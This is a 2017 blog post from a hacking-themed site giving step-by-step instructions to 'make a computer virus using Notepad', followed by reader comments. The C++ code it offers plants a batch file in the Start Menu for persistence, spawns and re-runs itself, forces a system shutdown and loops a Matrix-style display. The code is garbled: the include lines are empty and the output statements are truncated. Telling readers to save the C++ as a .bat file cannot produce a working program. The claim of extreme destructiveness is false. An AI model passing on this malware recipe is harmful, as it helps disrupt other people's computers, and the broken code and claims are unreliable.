Thursday 13 April 2017

How to make computer virus using Notepad ǀǀ Matrix ǀǀ Updated


A Computer Virus is a piece of code that is capable of copying itself and typically has detrimental effect, such as corrupting the system or destroying data.

A Computer virus is a malware program that, when executed, replicates by inserting copies of itself into other programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected". A simple virus that can make a copy of itself over and over again is relatively easy to produce. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems.These programs periodically check your computer system for the best-known types of viruses.In this post, I'm going to make the most destructive virus ever created by any Software Engineer. 

Warning -please do not run it on your computer or in school/ college computers

1. Open Notepad
2. Type in the following codes in the Notepad:-

#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\rawr.bat";
ifstream input(inputFile);
if (!input)
{
  {
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\rawr.bat", ios::app);
fp
fp
fp
  }
}
else
{
while (!input.eof())
  {
input.getline(buffer,255);
  }
 }
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
 {
  {
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
 }
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
  }
 }
}

START: 
{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
 }
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;

3. Save it as matrix.bat

And we are done with this. If you find any problem in executing this prank, do comment in the comment section. 
Share:

8 comments:

  1. Sir how to create gif in the post upper in title eating computer?

    ReplyDelete
  2. Good article sir

    ReplyDelete
  3. إنه لأمر مدهش أن ترى قطعة جيدة من التعليمات البرمجية لتغيير الجهاز الرجال أذكياء يمكنهم تغيير الجهاز مع بعض التعليمات البرمجية

    ReplyDelete
  4. 看到一段很好的代码来更换设备真是太神奇了。聪明的人可以用一些代码来更换设备

    ReplyDelete

Categories

Blog Archive

copyright @bros villa. Powered by Blogger.

Copyright © Hackers villa | Powered by Blogger Design by PWT | Blogger Theme by NewBloggerThemes.com